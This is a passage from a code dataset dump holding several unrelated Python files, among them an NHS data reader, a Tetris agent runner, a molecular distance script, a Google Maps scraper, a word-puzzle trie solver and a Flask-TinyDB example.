self._cached_dataset_lookups[self._cached_dataset_lookups['Type']==dt]['Dataset'].tolist()\n self.datasets = [ds for ds in datasets if ds in dataset_codes ]\n \n for dataset in self.datasets:\n #Use a pre-existing copy of the dataset if we have one\n if dataset in self._cached_datasets:\n data[dataset] = self._cached_datasets[dataset]\n continue\n elif self._dbtable_exists(dataset):\n #if we have a recent copy, use it\n if self._checkdbcopyiscurrent(dataset):\n data[dataset] = self.read_db(table=dataset)\n continue\n \n # Build URL for API call\n try:\n url=self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==dataset].iloc[0]['URL']\n \n #Should trap as a warning\n if dataset not in jdata: return DataFrame()\n \n names=list(rename_duplicates(jdata[dataset]['cols']))\n dates=jdata[dataset]['dates']\n codes=jdata[dataset]['codes']\n index=jdata[dataset]['index']\n \n #Try to guess cols to cast as dates\n if dates=='auto':\n dates=[names.index(c) for c in names if 'date' in c.lower()]\n\n #Try to guess columns that should be classed as string not int\n dtypes={c:str for c in names\n if \"phone\" in c.lower() or \" code\" in c.lower() or \"type\" in c.lower()}\n\n df = read_csv(self.zipgrabberfile(url, '{}.csv'.format(dataset)),\n header=None, names=None if names==[] else names, parse_dates=dates,\n low_memory=False, encoding='Latin-1')\n \n for c in df.columns:\n if c.startswith('Null') : df.drop(c, axis=1, inplace=True)\n if codes is not None:\n for col in codes:\n df[col + ' Value']=df[col].astype(str).map(codes[col])\n #The db table writer ignores the index...\n #if index=='auto':\n # index=[names[0]]\n #if index is not None: df=df.set_index(index)\n\n if dataset not in self._cached_datasets: self._cached_datasets[dataset]=df\n self._updatedb(dataset, df)\n data[dataset]=df\n\n except ValueError as e:\n msg = str(e) + ' dataset: ' + dataset\n if self.errors == 'raise':\n raise ValueError(msg)\n elif self.errors == 'warn':\n warnings.warn(msg)\n\n # Confirm we actually got some data, and build Dataframe\n if len(data) > 1:\n return data\n elif len(data) == 1:\n return data[list(data)[0]]\n else:\n msg = \"No datasets returned data.\"\n raise ValueError(msg)\n\n\ndef download(dataset=None, datatype=None,\n errors='warn', sqlite3db=None, **kwargs):\n \"\"\"\n Download datasets from NHS Digital Organisation Data Service\n \n Parameters\n 
----------\n dataset: string or list of strings\n taken from the dataset codes in dataset URLs\n datatype: string or list of strings\n taken from the data collection page\n errors: str {'ignore', 'warn', 'raise'}, default 'warn'\n Dataset and datatype codes are validated against a hardcoded list. This controls\n the outcome of that validation.\n errors='raise', will raise a ValueError on a bad dataset or datatype code.\n kwargs:\n keywords passed to NHSDigitalOrganisationDataServiceReader\n Returns\n -------\n ``pandas`` DataFrame with columns: country, iso_code, year,\n indicator value.\n \"\"\"\n return NHSDigitalOrganisationDataServiceReader(datasets=dataset, datatypes=datatype,\n sqlite3db=sqlite3db,\n **kwargs).read()\n\ndef search(string='GP', field='Dataset', case=False, **kwargs):\n \"\"\"\n Search available datasets from NHS Digital Organisation Data Service\n Parameters\n ----------\n string: string\n regular expression\n field: string\n Label, Period, Dataset, Type, Date\n See notes below\n case: bool\n case sensitive search?\n Notes\n -----\n The first time this function is run it will download and cache the full\n list of available datasets. Depending on the speed of your network\n connection, this can take time. Subsequent searches will use the cached\n copy, so they should be much faster.\n Label : code label for dataset\n Period: reporting period\n Dataset: title of dataset\n Date: reporting date\n Type: general category dataset is listed under\n \"\"\"\n\n return NHSDigitalOrganisationDataServiceReader(**kwargs).search(string=string, field=field,\n case=case)\ndef setdb(sqlite3db='default.sqlite', **kwargs):\n '''\n Enable a db.\n '''\n NHSDigitalOrganisationDataServiceReader(sqlite3db=sqlite3db, **kwargs).setdb()\n\ndef updatedb(sqlite3db='default.sqlite', tables=\"all\",**kwargs):\n \"\"\"\n Populate the SQLite3 database. 
This may take some time.\n \"\"\"\n datasets=None\n datatypes=None\n if isinstance(tables, str):\n if tables=='all':\n datasets=dataset_codes\n elif tables in dataset_codes: datasets = [tables]\n elif tables in datatype_codes: datatypes = [tables]\n elif isinstance(tables, list):\n for table in tables:\n if table in dataset_codes: datasets.append(table)\n elif table in datatype_codes: datatypes.append(table)\n download(dataset=datasets, datatype=datatypes, sqlite3db=sqlite3db, **kwargs)\n\ndef availableDatasets(typ=\"offline\", **kwargs):\n if typ==\"offline\":\n return NHSDigitalOrganisationDataServiceReader().read_db(q='SELECT * FROM dataset_date WHERE Date!=\"None\"')\n return NHSDigitalOrganisationDataServiceReader().cached()\n\ndef init(sqlite3db=None,**kwargs):\n NHSDigitalOrganisationDataServiceReader(sqlite3db=sqlite3db, **kwargs).init()\n\n\n","repo_name":"ouseful-datasupply/python-pandas-datareader-NHSDigital","sub_path":"pd_datareader_nhs/nhs_digital_ods.py","file_name":"nhs_digital_ods.py","file_ext":"py","file_size_in_byte":17780,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6755601926","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='pyOpenCGA',\n version='0.8',\n description='A REST client for OpenCGA web services',\n long_description=long_description,\n long_description_content_type='text/x-rst',\n packages=['pyopencga', 'pyopencga.Utils', 'pyopencga.rest_clients'],\n license='Apache Software License',\n author='David Gomez-Peregrina',\n author_email='david.gomez@mgviz.org',\n keywords='opencb opencga bioinformatics genomic database',\n install_requires=[\n 'pip >= 7.1.2',\n 'requests >= 2.7',\n 'avro == 1.7.7',\n 'pathlib >= 1.0.1',\n 'requests_toolbelt >= 0.7.0',\n 'pyyaml',\n 'retrying'\n ],\n project_urls={\n 'Documentation': 'http://docs.opencb.org/display/opencga/RESTful+Web+Services+and+Clients',\n 'Source': 'https://github.com/opencb/opencga/tree/develop/opencga-client/src/main/python',\n 'OpenCGA': 'https://github.com/opencb/opencga',\n 'OpenCGA Documentation': 'http://docs.opencb.org/display/opencga',\n 'Bug Reports': 'https://github.com/opencb/opencga/issues',\n }\n)\n\n","repo_name":"rgiffen/opencga","sub_path":"opencga-client/src/main/python/pyOpenCGA/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11379762945","text":"\"\"\"\nRunning the game with different agents\n\"\"\"\nfrom agent import (\n ReflexiveHierarchicalAgent, PlanningTwoMovesHierarchicalAgent, ProbabilisticPlanningHierarchicalAgent,\n LimitedProbabilisticPlanningHierarchicalAgent\n)\nfrom features import FringeSmoothness, HoleCount, EmptyRowsCount, AverageHeight\nfrom tetris import Game\nfrom utility import Utility\nfrom world import Config\n\n\ndef run_game():\n game = Game(Config())\n utility = Utility(\n [FringeSmoothness(), HoleCount(), EmptyRowsCount(), AverageHeight()],\n [3.2375932, 14.10950807, 22.32253916, 30.96122022]\n )\n # game.run_agent(ProbabilisticPlanningHierarchicalAgent(utility))\n game.run_agent(LimitedProbabilisticPlanningHierarchicalAgent(utility))\n # 
game.run_agent(PlanningOneMoveHierarchicalAgent(utility))\n # game.run_agent(ReflexiveHierarchicalAgent(utility))\n\n\nif __name__ == '__main__':\n run_game()","repo_name":"alexgorin/tetrisai","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42945686394","text":"import numpy as np\nimport sys\nimport os\nimport math\nimport subprocess\nimport re\nimport time\nimport copy\nimport abmptools as ampt\n# Matrix operation\n\n\nif __name__ == \"__main__\":\n ## -- user setting --\n # read info\n mode = 'resnum' #rfile, resnum\n calcmode = 'id-id' #molpair, id, id-id\n step = 1.0\n assignmolname = False\n refreshatmtype = False\n\n # tgtmol = 2\n tgt1 = '000'\n tgt2 = '000'\n ## -- setting end --\n\n centermolid = 20\n tgtmol = '000'\n # main\n argvs = sys.argv\n # fname = str(argvs[1])\n\n if calcmode == 'molpair':\n ofile= 'dist-' + tgt1 + '-' + tgt2 + '.txt'\n o2file= 'hist-' + tgt1 + '-' + tgt2 + '.txt'\n o3file= 'rdf-' + tgt1 + '-' + tgt2 + '.txt'\n\n if calcmode == 'id':\n ofile= 'dist-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n o2file= 'hist-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n o3file= 'rdf-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n\n if calcmode == 'id-id':\n id1 = int(argvs[2])\n id2 = int(argvs[3])\n # print(id1, id2)\n\n for arg in argvs:\n if arg == '--move':\n moveflag == True\n if arg == '--nomove':\n moveflag == False\n\n for ii in range(len(argvs)):\n if ii == 0:\n continue\n if argvs[ii][0:2] == '--':\n continue\n fname = argvs[ii]\n oname, ext = os.path.splitext(fname)\n if ext != '.pdb':\n oname = oname.split('.pdb')[0] + ext.split('.')[1] + '-moved'\n else:\n oname = oname + '-moved'\n\n obj = ampt.setfmo()\n obj.getmode = mode\n obj.assignmolname = assignmolname\n obj.refreshatmtype = refreshatmtype\n\n # print('infile:', fname)\n # print('oname:', oname)\n # print('centered-molid:', tgtmol - 1)\n\n # get pdbinfo\n obj.readpdb(fname)\n mollist = [i for i in range(obj.totalRes)]\n cellsize = obj.getpdbcell(fname)\n obj.cellsize = cellsize\n\n print('obj.totalRes:', obj.totalRes)\n\n if len(obj.cellsize) == 0:\n obj.cellsize = 0\n print('cellinfo: None')\n else:\n print('cellsize:', obj.cellsize)\n\n if calcmode == 'molpair':\n targets = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgt1:\n targets.append(i)\n print('target1 id', targets)\n\n targets2 = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgt2:\n targets2.append(i)\n print('target2 id', targets2)\n\n # centerOfMol: com of each molecules\n cocs = []\n for i in targets:\n cocs.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', cocs)\n\n cocs2 = []\n for i in targets2:\n cocs2.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', cocs)\n\n # getdist\n dists = []\n for i in range(len(targets)):\n for j in range(i, len(targets2)):\n if targets[i] == targets[j]:\n continue\n dists.append(obj.getdist_list(cocs[i], cocs2[j]))\n print('dists', dists)\n\n print(len(cocs), len(cocs2), len(dists))\n\n if calcmode == 'id':\n targets = []\n for i in range(obj.totalRes):\n # print(obj.resnames[i])\n if obj.resnames[i] == tgtmol:\n targets.append(i)\n print('tgtmol id', targets)\n print('coc', obj.posRes[centermolid])\n\n # centerOfMol: com of each molecules\n cocs = []\n for i in targets:\n cocs.append(obj.getCenter(obj.posRes[i]).tolist())\n # print('cocs', 
cocs)\n\n # getdist\n dists = []\n for i in range(len(targets)):\n dists.append(obj.getdist_list(cocs[i], cocs[centermolid]))\n print('dists', dists)\n\n print(len(dists))\n\n if calcmode == 'id-id':\n coc1 = obj.getCenter(obj.posRes[id1]).tolist()\n coc2 = obj.getCenter(obj.posRes[id2]).tolist()\n\n # getdist\n dist = obj.getdist_list(coc1, coc2)\n print('dist mol', str(id1) + '-' + str(id2) + ':', dist)\n\n sys.exit()\n# # if calcmode == 'particle':\n# # atoms = []\n# # for tgt in targets:\n# # atoms.append(obj.getnameAtom(uobj, tgt))\n# # # print(atoms)\n# #\n# # tgtobj.posRes = []\n# # for i in range(len(obj.posRes)):\n# # for j in range(len(atoms[i])):\n# # if atoms[i][j] == tgtpart:\n# # tgtobj.posRes.append(obj.posRes[i][j])\n# #\n# # # getdist\n# # dists = []\n# # for i in range(len(tgtobj.posRes)):\n# # dists.append(obj.getdist_list(tgtobj.posRes[i], centerpos))\n# # print('dists', dists)\n#\n#\n f = open(ofile, 'w')\n for dist in dists:\n print('{:8.3f}'.format(dist), file=f)\n f.close()\n\n # check distribution\n print('--- histogram ---')\n ddatas = []\n for i in range(0, math.ceil(100/step)):\n dcount = 0\n for dist in dists:\n if (dist > step * i - (step/2.0)) and (dist < (step * i + (step/2.0))):\n dcount += 1\n print(step*i, dcount)\n ddatas.append([step*i, dcount])\n\n f = open(o2file, 'w')\n for ddata in ddatas:\n print('{0[0]:8.3f} {0[1]:>10}'.format(ddata), file=f)\n f.close()\n\n # get areavol\n areas = []\n rdfs = []\n astart = 0\n for i in range(0, math.ceil(100/step)):\n rend = step * i + (step/2.0)\n aend = 4.0/3.0 * math.pi * rend ** 3\n areas.append(aend - astart)\n rdfs.append([ddatas[i][0], ddatas[i][1]/(aend-astart)])\n astart = copy.deepcopy(aend)\n\n print(areas)\n\n print('--- rdf ---')\n print(rdfs)\n f = open(o3file, 'w')\n for rdf in rdfs:\n print('{0[0]:8.3f} {0[1]:>10}'.format(rdf), file=f)\n f.close()\n\n print('out:', ofile, o2file, o3file)\n\n","repo_name":"kojioku/abmptools","sub_path":"tips/pdbtips/getrdfpdb.py","file_name":"getrdfpdb.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"74242874292","text":"import sys\nimport time\n\nimport selenium.common.exceptions\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\n\n\ndef wait_for_site_load():\n script = \"\"\"\n function waitCss(selector, n=1, require=false, timeout=5000) {\n console.log(selector, n, require, timeout);\n var start = Date.now();\n while (Date.now() - start < timeout){\n if (document.querySelectorAll(selector).length >= n){\n return document.querySelectorAll(selector);\n }\n }\n if (require){\n throw new Error(`selector \"${selector}\" timed out in ${Date.now() - start} ms`);\n } else {\n return document.querySelectorAll(selector);\n }\n }\n\n var results = waitCss(\"div[role*=article]>a\", n=10, require=false);\n return Array.from(results).map((el) => el.getAttribute(\"href\"))\n \"\"\"\n return script\n\n\ndef element_remover(hits, str_to_remove):\n # remove duplicates\n sorted_hits = list(dict.fromkeys(hits)) # better to not collect duplicates\n\n # remove elements containing 'tøjcontainer'\n for element in sorted_hits:\n if element.accessible_name.find(str_to_remove) != -1:\n print(f'removed {element.accessible_name} with id {element.id}')\n sorted_hits.remove(element) # somehow two always escape\n\n return sorted_hits\n\n\ndef search_bar_unclicker(driver):\n mouse_tracker = 
driver.find_element(By.XPATH, '/html/body/div[3]/div[8]/div[9]/div/div/div[1]/div[2]/div/div['\n '1]/div/div/div[1]/div[1]/div[6]')\n ActionChains(driver) \\\n .move_to_element(mouse_tracker) \\\n .click(mouse_tracker) \\\n .perform()\n\n time.sleep(1)\n\n\ndef search(query, word_to_avoid):\n driver = webdriver.Firefox()\n url = f\"https://www.google.com/maps/search/{query.replace(' ', '+')}/\"\n\n try:\n driver.get(url)\n\n # pass the cookie page\n time.sleep(1)\n cookie = driver.find_element(By.XPATH, '/html/body/c-wiz/div/div/div/div[2]/div[1]/div[3]'\n '/div[1]/div[1]/form[1]/div/div/button')\n cookie.click()\n\n # unclick search bar\n search_bar_unclicker(driver)\n\n # lists the first 7 hits, a scroll is needed to load more\n hits = []\n sys.stdout.write('Loading elements')\n # TODO change looping method, still sometimes breaks off at the end\n while len(hits) < 200:\n found_elements = driver.find_elements(By.CLASS_NAME, 'hfpxzc')\n hits.extend(found_elements)\n if hits:\n action = ActionChains(driver)\n bob = hits[-1].location_once_scrolled_into_view # TODO look up\n action.scroll_to_element(hits[-1]).perform()\n time.sleep(2) # TODO change to wait for next element to load\n\n sys.stdout.write('.') # a loading bar while waiting for the while loop to finish\n sys.stdout.flush()\n\n sys.stdout.write('\\n') # add space after loading\n hits = element_remover(hits, word_to_avoid)\n\n # visualizer for collected data, TODO save as file instead, for data analysis\n for hit in hits:\n print(f'\\nGenbrug: {hit.accessible_name} med page id: {hit.id}')\n\n urls = driver.execute_script(wait_for_site_load()) # unused\n\n driver.quit()\n\n return urls or [url]\n\n finally:\n driver.minimize_window()\n","repo_name":"MagnusPC/openhours_webscraper","sub_path":"source/controller/place_finder.py","file_name":"place_finder.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33609441346","text":"from abc import abstractmethod\nimport numpy as np\nimport pandas as pd\nimport editdistance\nfrom typing import List\n\nfrom recommender.dataset import Dataset\n\nclass BaseRecommender:\n \"\"\"Base class for all recommender algorithms.\"\"\"\n\n def init_state(self, **kwargs):\n \"\"\"Initialize the recommender state with additional data if needed.\"\"\"\n pass\n\n @abstractmethod\n def fit(self, dataset: Dataset):\n \"\"\"Fit the recommender algorithm to the given data.\"\"\"\n\n @abstractmethod\n def predict(self, patient_id: str, condition_id: str, therapy_id: str = None):\n \"\"\"Recommend a list of k therapies with a predicted success rate.\"\"\"\n\n @staticmethod\n def _get_trials(p_trials, condition_ids: List[str]):\n \"\"\"Return the trials of the given conditions.\"\"\"\n return p_trials[p_trials.condition.isin(condition_ids)]\n\n @staticmethod\n def _get_utility_matrix(p_trials: pd.DataFrame, therapies: pd.DataFrame):\n \"\"\"Compute the utility matrix, using as value the 'successful' column. The result is a NxM utility matrix, where:\n - N is the number of conditions of each patient (i.e. the \"users\")\n - M is the number of available therapies (i.e. 
the \"items\")\"\"\"\n features = p_trials.pivot_table(index='condition', columns='therapy', values='successful', aggfunc='mean')\n features = features.reindex(columns=therapies.index)\n return features\n\n @staticmethod\n def _get_baseline_estimates(utility_matrix: pd.DataFrame, p_conditions: pd.DataFrame):\n \"\"\"Compute the baseline estimates on the given utility matrix.\"\"\"\n global_avg_rating = np.nanmean(utility_matrix)\n utility_matrix = utility_matrix.reindex(index=p_conditions.index.get_level_values('id')) # Re-index to include global baseline for conditions without therapies\n users_rating_deviation = (utility_matrix.mean(axis=1, skipna=True) - global_avg_rating).fillna(0).values # fillna for users with no ratings\n items_rating_deviation = (utility_matrix.mean(axis=0, skipna=True) - global_avg_rating).fillna(0).values\n global_baseline = global_avg_rating + (users_rating_deviation.reshape(-1,1) + items_rating_deviation.reshape(1,-1))\n global_baseline = pd.DataFrame(global_baseline, index=utility_matrix.index, columns=utility_matrix.columns)\n return global_baseline\n\n @staticmethod\n def _get_trials_sequences(p_trials: pd.DataFrame):\n \"\"\"Convert the given conditions in p_trials to a list of trials, ordered by start time.\"\"\"\n sequences = p_trials.sort_values('start').groupby(['condition'], observed=True)['therapy'].apply(list)\n return sequences\n\n @staticmethod\n def _build_patients_demographic_profiles(patients: pd.DataFrame):\n \"\"\"Build the patients profiles based on the available demographic data.\"\"\"\n patients = patients.copy().drop(columns=['name', 'email', 'birthdate'], errors='ignore')\n if 'age' in patients.columns: # Convert age to category\n patients['age'] = pd.cut(patients['age'], bins=[0, 2, 18, 30, 50, 70, np.inf], labels=['<2', '2-18', '18-30', '30-50', '50-70', '>70'])\n return patients\n\n @staticmethod\n def _build_patients_conditions_profiles(p_conditions: pd.DataFrame, conditions: pd.DataFrame):\n \"\"\"Build the patients profiles based on their medical conditions.\"\"\"\n profiles = pd.crosstab(p_conditions.index.get_level_values('patient'), p_conditions['kind']).astype(bool)\n profiles = profiles.reindex(columns=conditions.index)\n profiles.index.rename('id', inplace=True)\n return profiles\n\n @staticmethod\n def _jaccard_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the Jaccard similarity between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n other_index = other_items.index\n target_item, other_items = target_item.fillna(0).values.astype(bool), other_items.fillna(0).values.astype(bool)\n intersection = (target_item & other_items).sum(axis=1)\n union = (target_item | other_items).sum(axis=1)\n similarities = intersection / union\n similarities = pd.Series(similarities, index=other_index)\n return similarities\n\n @staticmethod\n def _hamming_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the normalized hamming similarity between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n intersection = (target_item.iloc[0] == other_items).sum(axis=1)\n similarities = intersection / target_item.shape[1]\n return similarities\n\n @staticmethod\n def _pearson_correlation(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the centered cosine similarity (pearson correlation) between the target item and all the other 
items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n other_index = other_items.index\n target_item, other_items = target_item.values, other_items.values\n # Normalize using rows means (centered cosine similarity)\n target_item = target_item - np.nanmean(target_item, axis=1, keepdims=True)\n other_items = other_items - np.nanmean(other_items, axis=1, keepdims=True)\n # Compute cosine similarity\n target_item[np.isnan(target_item)], other_items[np.isnan(other_items)] = 0, 0 # Set missing ratings to 0\n dot_prods = (other_items @ target_item.T).ravel() # Compute dot product between target_item and all other_items\n target_norm = np.linalg.norm(target_item, ord=2, axis=1)\n other_norms = np.linalg.norm(other_items, ord=2, axis=1)\n with np.errstate(divide='ignore', invalid='ignore'):\n similarities = dot_prods / (target_norm * other_norms)\n similarities = pd.Series(similarities, index=other_index)\n similarities = similarities.fillna(-1) # If NaN, one of the vectors is zeros-only. Set similarity to -1.\n return similarities\n\n @staticmethod\n def _levenshtein_similarity(target_item: pd.DataFrame, other_items: pd.DataFrame):\n \"\"\"Compute the Levenshtein distance between the target item and all the other items.\"\"\"\n assert target_item.shape[0] == 1, 'target_item must contain 1 element'\n target_sequence = target_item.iloc[0]\n similarities = pd.Series(index=other_items.index)\n for condition_id, sequence in other_items.iteritems():\n distance = editdistance.eval(target_sequence, sequence)\n max_len = max(len(target_sequence), len(sequence))\n similarity = max_len - distance # Convert distance to similarity\n similarities.loc[condition_id] = similarity\n return similarities\n","repo_name":"materight/therapy-recommender-system","sub_path":"recommender/algorithms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11297443562","text":"from time import sleep\nimport Adafruit_BBIO.ADC as ADC\n\n#initialize variables\ndayTimer = 0\nhourTimer = 0\navgTempHour = 0\navgTemp24Hours = 0\nhourTemperatureList = []\ndayTemperatureList = []\nlistTracker = 0\n\nsensor = 'P9_40'\nADC.setup()\n#initialize temps to first reading\nreading = ADC.read(sensor)\ncelsiusInitial = ((reading*1800) - 500) / 10\nsensor = 'P9_40'\nmaxTemp = celsiusInitial\nminTemp = celsiusInitial\nhourTemperatureList.append(celsiusInitial)\ndayTemperatureList.append(celsiusInitial)\n# add another while loop with another timer for every layer added, example: years, decades\nwhile dayTimer < 86400: #86400 seconds is 24 hours\n hourTimer = 0\n listTracker = 0\n avgTempHour = sum(hourTemperatureList)/len(hourTemperatureList)\n dayTemperatureList.append(avgTempHour)\n avgTemp24Hours = sum(dayTemperatureList)/len(dayTemperatureList)\n while hourTimer < 3600: # 3600 seconds is 1 hour\n reading = ADC.read(sensor)\n celsius = ((reading*1800) - 500) / 10\n hourTemperatureList.append(celsius)\n #print(celsius)\n #print(hourTemperatureList[listTracker])\n #print(minTemp)\n #print(maxTemp)\n if hourTemperatureList[listTracker] > maxTemp:\n maxTemp = hourTemperatureList[listTracker]\n #print(maxTemp)\n if hourTemperatureList[listTracker] < minTemp:\n minTemp = hourTemperatureList[listTracker]\n #print(minTemp)\n print('HourAvg=%f DayAvg=%f Min=%f Max=%f' % (avgTempHour, avgTemp24Hours,minTemp,maxTemp ))\n with open('/var/www/html/hourlyTempStatistics.html','w') as file:\n 
file.write(\"24 Hour Temp Stats\")\n file.write(\"

    CodyWanKenobi's Jedi Magic

    \")\n file.write(\"

    Current System Temperature Statistics (C): \\n\")\n file.write('HourAvg=%f DayAvg=%f Min=%f Max=%f' % (avgTempHour, avgTemp24Hours,minTemp,maxTemp ))\n file.write(\"

    \")\n listTracker += 1\n dayTimer += 120\n hourTimer += 120\n sleep(120) #take readings every two minutes\n","repo_name":"codyblack148/ThermostatSimulator","sub_path":"tempValues24Hours.py","file_name":"tempValues24Hours.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32742513612","text":"#!/usr/bin/env python3\n\n# ls -l /dev | grep -v total | awk '{print $4}' | sort | uniq -c | sort -rn\n\nimport os\n\ncounts = {}\nfor index, line in enumerate(os.popen('ls -l /dev')):\n if not index:\n continue\n group = line.split()[3]\n counts[group] = counts.get(group, 0) + 1\n\nfor group, count in sorted(counts.items(), key=lambda p: p[1], reverse=True):\n print('{:7} {}'.format(count, group))\n","repo_name":"nd-cse-20289-sp22/cse-20289-sp22-examples","sub_path":"lecture09/translate3.py","file_name":"translate3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35274408776","text":"import argparse\n\n_end = \"_end_\"\ndebug = False\n\n\nclass Trie:\n\n def __init__(self, words):\n self._root = dict()\n for word in words:\n current_dict = self._root\n for letter in word:\n current_dict = current_dict.setdefault(letter, {})\n current_dict[_end] = _end\n\n @property\n def root(self):\n return self._root\n\n def is_a_word_node(self, node: dict):\n return node.get(_end) is not None\n\n def get_children(self, node):\n return node.items()\n\n\nclass Letterbox:\n\n def __init__(self, letterbox_string, all_words_from_dictionary):\n letterbox = list()\n edges = letterbox_string.split(\"-\")\n for edge in edges:\n letterbox.append([c for c in edge])\n self._flattened_letterbox = set()\n for edge in letterbox:\n self._flattened_letterbox = self._flattened_letterbox.union(edge)\n self._adjacency_matrix = []\n for c1 in self._flattened_letterbox:\n for c2 in self._flattened_letterbox:\n for edge in letterbox:\n if c1 in edge and c2 in edge:\n self._adjacency_matrix.append(f\"{c1}{c2}\")\n self._allowed_words = [w.lower() for w in all_words_from_dictionary if self._is_allowed(w)]\n self._trie = Trie(self._allowed_words)\n\n def _is_adjacent(self, c1, c2):\n if c1 is None: return False\n return (c1 + c2) in self._adjacency_matrix\n\n def _is_allowed(self, word):\n letter_set = set(word)\n if not letter_set.intersection(self._flattened_letterbox) == letter_set:\n return False\n c_prev = None\n for c_curr in word:\n if self._is_adjacent(c_prev, c_curr):\n return False\n c_prev = c_curr\n return True\n\n def _is_a_word_node(self, node):\n return self._trie.is_a_word_node(node)\n\n def _all_words_from_this_node_down(self, node, word_fragment):\n valid_word_list = []\n for ni in node.items():\n subnode = ni[1]\n if subnode == _end: continue # Ignore the _end child - it signifies that the PARENT is a word. 
Additional children, however, indicate longer words.\n word_to_evaluate = word_fragment + ni[0]\n if self._is_a_word_node(subnode):\n valid_word_list.append(word_to_evaluate)\n for w in self._all_words_from_this_node_down(subnode, word_to_evaluate):\n valid_word_list.append(w)\n return valid_word_list\n\n\n @property\n def all_possible_words(self):\n return self._all_words_from_this_node_down(self._trie.root, '')\n\n def all_subsequent_words(self, prev_word):\n first_letter = prev_word[-1]\n subnode = self._trie.root.get(first_letter)\n if subnode is None:\n return []\n return self._all_words_from_this_node_down(subnode, first_letter)\n\n def is_complete(self, words):\n letters_used = set()\n for word in words:\n for c in word:\n letters_used = letters_used.union(c)\n rc = letters_used.intersection(self._flattened_letterbox) == self._flattened_letterbox\n if rc:\n return True\n else:\n if (debug): print(f\"{words} is lacking {self._flattened_letterbox - letters_used}\")\n\n @property\n def solutions(self):\n solutions = []\n for first_word in self.all_possible_words:\n for subsequent_word in self.all_subsequent_words(first_word):\n if self.is_complete([first_word, subsequent_word]):\n solutions.append(f\"{first_word}-{subsequent_word}\")\n return solutions\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Solve Letterbox Puzzle\")\n parser.add_argument('--puzzle', help='Dash-separated list of strings representing the edges of the puzzle. For example asd-feg-jiy-uiu', required=True)\n parser.add_argument('--dictionary', help='Dictionary (list of words)', default=\"words.txt\")\n args = parser.parse_args()\n with open(args.dictionary, \"r\") as f:\n all_words_from_dictionary = f.read().lower().split()\n print(f\"Solutions for letterbox {args.puzzle}: \")\n solutions = Letterbox(letterbox_string=args.puzzle, all_words_from_dictionary=all_words_from_dictionary).solutions\n for solution in solutions:\n print(f\" * {solution}\")\n\n\n\n\n\n\n\n","repo_name":"adrian2465/letterbox","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10072538534","text":"from flask import Flask\n\nfrom flask_tinydb import TinyDB\nfrom flask_tinydb.storages import YAMLStorage\n\napp = Flask(__name__)\napp.config[\"TINYDB_DATABASE_STORAGE\"] = YAMLStorage\ndb = TinyDB(app)\n\n\n@app.route(\"/\")\ndef index():\n all_pets = db.get_table().all()\n return \", \".join([value[\"name\"] for value in all_pets]) if all_pets else \"No pets\"\n\n\n@app.route(\"/add/\")\ndef add(pet):\n db.get_table().insert({\"name\": pet})\n return f\"Added {pet}\"\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"mmdbalkhi/Flask-tinydb","sub_path":"examples/use_yaml_db.py","file_name":"use_yaml_db.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"42696075825","text":"import json\n\n# Carrega texto\nwith open('estoque', 'r') as arquivo_json:\n texto = arquivo_json.read()\n\n# Converte para dicionário\ndicionario = json.loads(texto)\n\n# Calcula preço\npreco = 0\nfor produto in dicionario:\n qtde = dicionario['quantidade']\n preco = dicionario['valor']\n preco += 
